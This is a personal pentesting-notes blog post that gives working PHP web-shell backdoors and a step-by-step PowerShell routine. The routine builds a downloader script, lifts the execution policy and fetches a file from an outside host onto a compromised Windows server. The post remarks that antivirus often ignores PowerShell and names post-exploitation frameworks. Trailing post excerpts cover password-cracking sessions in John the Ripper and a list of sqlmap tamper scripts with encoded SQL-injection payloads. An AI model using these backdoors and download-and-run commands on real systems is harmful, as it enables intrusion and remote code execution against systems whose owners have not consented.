Skip to main content

From SHELL to POWERSHELL

Just to keep for my notes and reference. Because sometime hard to recall back on #HowTo

See 'clam' for more and `bash' for a shell script!


            ___
        .-"; ! ;"-.
      .'!  : | :  !`.
     /\  ! : ! : !  /\
    /\ |  ! :|: !  | /\
   (  \ \ ; :!: ; / /  )
  ( `. \ | !:|:! | / .' )
  (`. \ \ \!:|:!/ / / .')
   \ `.`.\ |!|! |/,'.' /
    `._`.\\\!!!// .'_.'
       `.`.\\|//.'.'
        |`._`n'_.'|  hjw
        "----^----"

Ok, let's assume that we are able to inject some malicious payload/code like using phpMyAdmin or whatever low-hanging fruits on the target SQLi, RCE or whatever.

1. For PHP these are the useful code:
========
PHP Info
========

<? phpinfo(); ?>

This might be useful for us to identify file path and default folder etc.

================
Simple PHP Backdoor
================

<?php system($_GET['cmd']); ?>

or

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

This one the most 'clean' version. Both of the code are in one line, we can simply append it into another filename that we like.

2. In order for us to perform the privilege escalation attack its depend on the target platform. Either the target is running on Windows or Linux. These two type of architecture have a different method to do it.

If the target are running Windows we can use powershell. As we know most of the Windows operating system by default have the powershell capabilities. Good thing about powershell some of the Anti-Virus/Malware are ignore if any command are execute.

As we know Windows does not have a wget or curl command to download from any or other external resources that we wanted to. To do that, with the existing shell that we append earlier, we can use echo command to write a new payload in order for us to use it.

First we create a new file called download.ps1:
================
Copy & Execute This
================

echo param($url, $filename) > download.ps1
echo $client = new-object System.Net.WebClient >> download.ps1
echo $client.DownloadFile( $url, $filename); >> download.ps1

The expected output of file should place the one that we echo line-by-line like these;

$ type download.ps1

param($url, $filename)
$client = new-object System.Net.WebClient
$client.DownloadFile( $url, $filename);

Next run this command:

$ powershell Set-ExecutionPolicy Unrestricted

This is to make sure that we had no restriction while we run the script.

$ powershell -ExecutionPolicy RemoteSigned -File "download.ps1" "http://somewhere.com/filename.ext" "C:\Windows\Temp\filename.ext"

The last command that we wanted to run. Make sure that both URL and file path that are set right before we execute it.

Another thing that I been wondering about these powershell is there any Webshell for Powershell? Yes we have it! While do some Google I found --> this  "Antak-WebShell" It is written in ASP.Net and its not support PHP :( But if you get lucky, some of Microsoft web server are running both PHP & IIS this is where we can use this.


Since we have this nice WebShell we can rely on another tools like Empire, PowerSploit or Nishang for post exploitation.

As for the conclusion, the step-by-step walkthrough may be in pain or you might get stuck on while working on this. Maybe you have a better technique to simplyfied it? Anyway, good luck with spawning the $HELL Cheers!!!



Comments

Popular posts from this blog

Create a session & restore abort/interrupted session in John The Ripper!

Been busy with report writing. Just wanna put some of these command and technique on how to restore interrupted session or aborted session in John The Ripper. 1. First step crack the hash with these commands : john --session=test --format=raw-sha --incremental=rockyou test.txt 2. To restore the abort /interrupted session that you wanted to resume just run these commands : john --restore=test Check the "test.log" Note:  Make sure that these file are not delete " .rec " and " .log " files if the file is deleted or missing it wont work. That's all happy cracking!

iOS - Convert .app to .ipa

While doing a iOS Security Testing, I wondered how do we convert .app into .ipa. So basically here are the structure of .ipa files. 1. First, SSH in your iPhone (Jailbroken). 2. Download the .app folder via scp  3. Copy the .app folder into a folder called Payload. 4. Compress it with .zip extension using any compression software. 5. Change the extension from file.zip to file.ipa. That’s it. Now you can use these .ipa files to install the app into your iPhone.

List of SQLMAP Tamper Scripts

Just re-post one of my visited reference blog post: Original URL: http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html Name Description Example apostrophemask.py Replaces apostrophe character with its UTF-8 full width counterpart '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' apostrophenullencode.py Replaces apostrophe character with its illegal double unicode counterpart '1 AND %271%27=%271' appendnullbyte.py Appends encoded NULL byte character at the end of payload '1 AND 1=1' base64encode.py Base64 all characters in a given payload 'MScgQU5EIFNMRUVQKDUpIw==' between.py Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' '1 AND A NOT BETWEEN 0 AND B--' bluecoat.py Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator 'SELECT%09id FROM users where id LIKE 1' chardoubleencode.py Double url-encodes all character